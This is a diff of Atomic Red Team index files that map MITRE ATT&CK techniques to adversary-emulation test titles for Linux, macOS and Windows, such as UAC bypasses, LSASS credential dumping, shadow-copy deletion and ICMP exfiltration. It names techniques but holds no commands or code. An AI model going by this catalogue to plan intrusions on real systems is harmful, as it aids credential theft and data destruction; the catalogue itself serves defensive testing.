- [T1071 Standard Application Layer Protocol](../../T1071/T1071.md)
|
||||
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
|
||||
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
|
||||
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
|
||||
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1065 Uncommonly Used Port](../../T1065/T1065.md)
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
|
||||
- [T1102 Web Service](../../T1102/T1102.md)
|
||||
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# initial-access
|
||||
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1193 Spearphishing Attachment](../../T1193/T1193.md)
|
||||
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -342,5 +342,5 @@
|
||||
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1100 Web Shell](../../T1100/T1100.md)
|
||||
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
|
||||
@@ -7,6 +7,7 @@
|
||||
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
|
||||
- [T1136 Create Account](../../T1136/T1136.md)
|
||||
- Atomic Test #2: Create a user account on a MacOS system [macos]
|
||||
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -18,7 +19,7 @@
|
||||
- Atomic Test #5: Hidden files [macos]
|
||||
- Atomic Test #6: Hide a Directory [macos]
|
||||
- Atomic Test #7: Show all hidden files [macos]
|
||||
- [T1215 Kernel Modules and Extensions](../../T1215/T1215.md)
|
||||
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1159 Launch Agent](../../T1159/T1159.md)
|
||||
- Atomic Test #1: Launch Agent [macos]
|
||||
@@ -51,10 +52,10 @@
|
||||
- [T1154 Trap](../../T1154/T1154.md)
|
||||
- Atomic Test #1: Trap [macos, linux]
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1100 Web Shell](../../T1100/T1100.md)
|
||||
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# impact
|
||||
- [T1531 Account Access Removal](../../T1531/T1531.md)
|
||||
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1485 Data Destruction](../../T1485/T1485.md)
|
||||
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
|
||||
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -63,7 +64,7 @@
|
||||
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
|
||||
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1496 Resource Hijacking](../../T1496/T1496.md)
|
||||
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
|
||||
@@ -83,7 +84,7 @@
|
||||
- Atomic Test #4: List opened files by user [linux, macos]
|
||||
- Atomic Test #6: Enumerate users and groups [linux, macos]
|
||||
- Atomic Test #7: Enumerate users and groups [macos]
|
||||
- [T1010 Application Window Discovery](../../T1010/T1010.md)
|
||||
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
|
||||
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
|
||||
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
|
||||
@@ -109,7 +110,7 @@
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- [T1063 Security Software Discovery](../../T1063/T1063.md)
|
||||
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
|
||||
- [T1518 Software Discovery](../../T1518/T1518.md)
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1082 System Information Discovery](../../T1082/T1082.md)
|
||||
- Atomic Test #2: System Information Discovery [macos]
|
||||
- Atomic Test #3: List OS Information [linux, macos]
|
||||
@@ -145,7 +146,7 @@
|
||||
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1154 Trap](../../T1154/T1154.md)
|
||||
- Atomic Test #1: Trap [macos, linux]
|
||||
- [T1204 User Execution](../../T1204/T1204.md)
|
||||
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# lateral-movement
|
||||
- [T1155 AppleScript](../../T1155/T1155.md)
|
||||
@@ -167,9 +168,9 @@
|
||||
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# collection
|
||||
- [T1123 Audio Capture](../../T1123/T1123.md)
|
||||
- [T1119 Automated Collection](../../T1119/T1119.md)
|
||||
- [T1115 Clipboard Data](../../T1115/T1115.md)
|
||||
- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1074 Data Staged](../../T1074/T1074.md)
|
||||
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
|
||||
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -177,7 +178,7 @@
|
||||
- Atomic Test #1: Search macOS Safari Cookies [macos]
|
||||
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1056 Input Capture](../../T1056/T1056.md)
|
||||
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1113 Screen Capture](../../T1113/T1113.md)
|
||||
- Atomic Test #1: Screencapture [macos]
|
||||
- Atomic Test #2: Screencapture (silent) [macos]
|
||||
@@ -205,14 +206,14 @@
|
||||
# credential-access
|
||||
- [T1139 Bash History](../../T1139/T1139.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1110 Brute Force](../../T1110/T1110.md)
|
||||
- [T1003 Credential Dumping](../../T1003/T1003.md)
|
||||
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1003 Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1081 Credentials in Files](../../T1081/T1081.md)
|
||||
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1056 Input Capture](../../T1056/T1056.md)
|
||||
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1141 Input Prompt](../../T1141/T1141.md)
|
||||
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
|
||||
- [T1142 Keychain](../../T1142/T1142.md)
|
||||
@@ -236,7 +237,7 @@
|
||||
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
|
||||
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
|
||||
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1500 Compile After Delivery](../../T1500/T1500.md)
|
||||
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1090 Connection Proxy](../../T1090/T1090.md)
|
||||
- Atomic Test #1: Connection Proxy [macos, linux]
|
||||
- [T1089 Disabling Security Tools](../../T1089/T1089.md)
|
||||
@@ -272,7 +273,7 @@
|
||||
- Atomic Test #7: Show all hidden files [macos]
|
||||
- [T1147 Hidden Users](../../T1147/T1147.md)
|
||||
- Atomic Test #1: Hidden Users [macos]
|
||||
- [T1143 Hidden Window](../../T1143/T1143.md)
|
||||
- T1143 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
|
||||
- Atomic Test #3: rm -rf [macos, linux]
|
||||
@@ -281,15 +282,15 @@
|
||||
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1152 Launchctl](../../T1152/T1152.md)
|
||||
- Atomic Test #1: Launchctl [macos]
|
||||
- [T1036 Masquerading](../../T1036/T1036.md)
|
||||
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
|
||||
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
|
||||
- [T1150 Plist Modification](../../T1150/T1150.md)
|
||||
- Atomic Test #1: Plist Modification [macos]
|
||||
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1055 Process Injection](../../T1055/T1055.md)
|
||||
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1014 Rootkit](../../T1014/T1014.md)
|
||||
- T1014 Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1064 Scripting](../../T1064/T1064.md)
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
|
||||
- [T1045 Software Packing](../../T1045/T1045.md)
|
||||
@@ -304,7 +305,7 @@
|
||||
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1102 Web Service](../../T1102/T1102.md)
|
||||
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# command-and-control
|
||||
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -324,7 +325,7 @@
|
||||
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1219 Remote Access Tools](../../T1219/T1219.md)
|
||||
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1105 Remote File Copy](../../T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
@@ -334,17 +335,17 @@
|
||||
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
|
||||
- [T1071 Standard Application Layer Protocol](../../T1071/T1071.md)
|
||||
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
|
||||
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
|
||||
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
|
||||
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1065 Uncommonly Used Port](../../T1065/T1065.md)
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
|
||||
- [T1102 Web Service](../../T1102/T1102.md)
|
||||
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# initial-access
|
||||
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1193 Spearphishing Attachment](../../T1193/T1193.md)
|
||||
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -361,7 +362,7 @@
|
||||
- Atomic Test #1: Launch Daemon [macos]
|
||||
- [T1150 Plist Modification](../../T1150/T1150.md)
|
||||
- Atomic Test #1: Plist Modification [macos]
|
||||
- [T1055 Process Injection](../../T1055/T1055.md)
|
||||
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1166 Setuid and Setgid](../../T1166/T1166.md)
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
|
||||
@@ -374,5 +375,5 @@
|
||||
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1100 Web Shell](../../T1100/T1100.md)
|
||||
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
|
||||
@@ -5,7 +5,7 @@
|
||||
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
|
||||
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
|
||||
- Atomic Test #3: Persist, Download, & Execute [windows]
|
||||
- [T1009 Binary Padding](../../T1009/T1009.md)
|
||||
- T1009 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1088 Bypass User Account Control](../../T1088/T1088.md)
|
||||
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
|
||||
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
|
||||
@@ -13,6 +13,7 @@
|
||||
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
|
||||
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
|
||||
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
|
||||
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
|
||||
- [T1191 CMSTP](../../T1191/T1191.md)
|
||||
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
|
||||
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
|
||||
@@ -129,6 +130,7 @@
|
||||
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
|
||||
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
|
||||
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
|
||||
- Atomic Test #4: Execution from Compressed File [windows]
|
||||
- [T1502 Parent PID Spoofing](../../T1502/T1502.md)
|
||||
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
|
||||
- T1186 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -171,7 +173,7 @@
|
||||
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
|
||||
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
|
||||
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
|
||||
- [T1045 Software Packing](../../T1045/T1045.md)
|
||||
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1099 Timestomp](../../T1099/T1099.md)
|
||||
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
|
||||
@@ -209,6 +211,7 @@
|
||||
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
|
||||
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
|
||||
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
|
||||
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
|
||||
- [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
|
||||
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
|
||||
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -267,6 +270,7 @@
|
||||
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
|
||||
- [T1042 Change Default File Association](../../T1042/T1042.md)
|
||||
- Atomic Test #1: Change Default File Association [windows]
|
||||
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -368,7 +372,7 @@
|
||||
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
|
||||
- Atomic Test #6: Windows - Delete Backup Files [windows]
|
||||
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1496 Resource Hijacking](../../T1496/T1496.md)
|
||||
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1489 Service Stop](../../T1489/T1489.md)
|
||||
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
|
||||
@@ -390,7 +394,8 @@
|
||||
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
|
||||
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
|
||||
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
|
||||
- Atomic Test #5: List Google Chrome Bookmarks on Windows with command prompt. [windows]
|
||||
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt. [windows]
|
||||
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt. [windows]
|
||||
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
|
||||
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
|
||||
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
|
||||
@@ -398,7 +403,7 @@
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
|
||||
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #2: Network Share Discovery command prompt [windows]
|
||||
- Atomic Test #3: Network Share Discovery PowerShell [windows]
|
||||
@@ -477,6 +482,7 @@
|
||||
- Atomic Test #14: GPP Passwords (Get-GPPPassword) [windows]
|
||||
- Atomic Test #15: LSASS read with pypykatz [windows]
|
||||
- Atomic Test #16: Registry parse with pypykatz [windows]
|
||||
- Atomic Test #17: Run Chrome-password Collector [windows]
|
||||
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1081 Credentials in Files](../../T1081/T1081.md)
|
||||
- Atomic Test #3: Extracting passwords with findstr [windows]
|
||||
@@ -562,15 +568,15 @@
|
||||
- Atomic Test #1: Stage data from Discovery.bat [windows]
|
||||
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
|
||||
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1005 Data from Local System](../../T1005/T1005.md)
|
||||
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1114 Email Collection](../../T1114/T1114.md)
|
||||
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
|
||||
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
|
||||
- [T1056 Input Capture](../../T1056/T1056.md)
|
||||
- Atomic Test #1: Input Capture [windows]
|
||||
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1113 Screen Capture](../../T1113/T1113.md)
|
||||
- T1113 Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# exfiltration
|
||||
@@ -582,7 +588,7 @@
|
||||
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
|
||||
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
|
||||
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
|
||||
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
|
||||
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
|
||||
- Atomic Test #4: Exfiltration Over Alternative Protocol - ICMP [windows]
|
||||
- T1041 Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -594,7 +600,7 @@
|
||||
- [T1191 CMSTP](../../T1191/T1191.md)
|
||||
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
|
||||
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
|
||||
- [T1059 Command-Line Interface](../../T1059/T1059.md)
|
||||
- T1059 Command-Line Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1223 Compiled HTML File](../../T1223/T1223.md)
|
||||
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
|
||||
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
|
||||
@@ -604,7 +610,8 @@
|
||||
- [T1173 Dynamic Data Exchange](../../T1173/T1173.md)
|
||||
- Atomic Test #1: Execute Commands [windows]
|
||||
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
|
||||
- T1106 Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1106 Execution through API](../../T1106/T1106.md)
|
||||
- Atomic Test #1: Execution through API - CreateProcess [windows]
|
||||
- T1129 Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -707,7 +714,7 @@
|
||||
- Atomic Test #2: portproxy reg key [windows]
|
||||
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1132 Data Encoding](../../T1132/T1132.md)
|
||||
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
@@ -1,32 +1,32 @@
|
||||
# Linux Atomic Tests by ATT&CK Tactic & Technique
|
||||
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|
||||
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](../../T1059/T1059.md) | [.bash_profile and .bashrc](../../T1156/T1156.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | [Account Discovery](../../T1087/T1087.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | [Process Injection](../../T1055/T1055.md) | [Binary Padding](../../T1009/T1009.md) | [Bash History](../../T1139/T1139.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | [Data Compressed](../../T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1166/T1166.md) | [Clear Command History](../../T1146/T1146.md) | [Brute Force](../../T1110/T1110.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | [Data Encrypted](../../T1022/T1022.md) | [Connection Proxy](../../T1090/T1090.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| [Spearphishing Attachment](../../T1193/T1193.md) | [Local Job Scheduling](../../T1168/T1168.md) | [Browser Extensions](../../T1176/T1176.md) | [Sudo](../../T1169/T1169.md) | [Compile After Delivery](../../T1500/T1500.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](../../T1074/T1074.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
